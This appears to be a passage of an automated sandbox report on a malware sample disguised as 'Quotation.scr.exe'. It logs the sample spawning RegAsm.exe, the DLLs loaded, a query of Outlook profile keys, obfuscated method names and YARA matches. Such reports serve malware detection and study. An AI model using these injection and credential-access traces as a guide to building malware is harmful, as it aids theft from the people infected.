                    Source: Quotation.scr.exeReversingLabs: Detection: 31%
                    Source: unknownProcess created: C:\Users\user\Desktop\Quotation.scr.exe "C:\Users\user\Desktop\Quotation.scr.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Quotation.scr.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Quotation.scr.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Quotation.scr.exe, 00000000.00000002.2252517628.0000000003461000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2255020547.0000000005A70000.00000004.08000000.00040000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2252517628.00000000033E9000.00000004.00000800.00020000.00000000.sdmp, Quotation.scr.exe, 00000000.00000002.2245862196.0000000002876000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdbSHA256}Lq source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp
                    Source: Binary string: protobuf-net.pdb source: Quotation.scr.exe, 00000000.00000002.2254190074.00000000057F0000.00000004.08000000.00040000.00000000.sdmp

                    Data Obfuscation

                    barindex
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.5a70000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3411570.1.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, ListDecorator.cs.Net Code: Read
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                    Source: 0.2.Quotation.scr.exe.57f0000.7.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                    Source: 0.2.Quotation.scr.exe.3461590.3.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                    Source: Yara matchFile source: 0.2.Quotation.scr.exe.5790000.6.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000000.00000002.2254071383.0000000005790000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.2245862196.0000000002427000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: Quotation.scr.exe PID: 3108, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0578A411 push eax; retf 0_2_0578A414
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_0586BBC0 push eax; retf 0_2_0586BBCD
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D1D9B push E8FFFFFFh; retf 0_2_058D1DA1
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_058D7021 push cs; iretd 0_2_058D7027
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_059336C7 push es; retf 0_2_059336CC
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B831B0 pushad ; iretd 0_2_05B831B3
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B8088C push E8000001h; retf 0_2_05B80891
                    Source: C:\Users\user\Desktop\Quotation.scr.exeCode function: 0_2_05B85735 push cs; retf 0000h0_2_05B85740
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012DB570 push dword ptr [ebp+ebx-75h]; iretd 2_2_012DB53D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D891E pushad ; iretd 2_2_012D891F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D8DDF push esp; iretd 2_2_012D8DE0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_012D8C2F pushfd ; iretd 2_2_012D8C30
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, j1bgXlDUmHmGlK1NBYE.csHigh entropy of concatenated method names: 'h9HDd96Wny', 'fsjDyNHK2tCrwAeP9x4', 'pjFY98Htqf1gQslItLF', 'peHcXZHG3bYOHBxDsKT', 'J2Wc56HLHNZlZSebJJl', 'dOSrw4HIgK03o09w7fb', 'cOgA20HTgH0paud1qRc', 'DRhjK9HxO20DARA6lmU'
                    Source: 0.2.Quotation.scr.exe.5590000.5.raw.unpack, NoxXayDsnjOk43FfmnZ.csHigh entropy of concatenated method names: 'RtlInitUnicodeString', 'LdrLoadDll', 'RtlZeroMemory', 'NtQueryInformationProcess', 'ykYDYLGTgV', 'NtProtectVirtualMemory', 'E6HC7OHHvXlvbXa3iGt', 'pgNU8HHiX9P0FOekBxb', 'D5T1GdHa0rFuLt37KBN', 'SvLMhoH8WNNyys5q8NR'
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\Quotation.scr.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
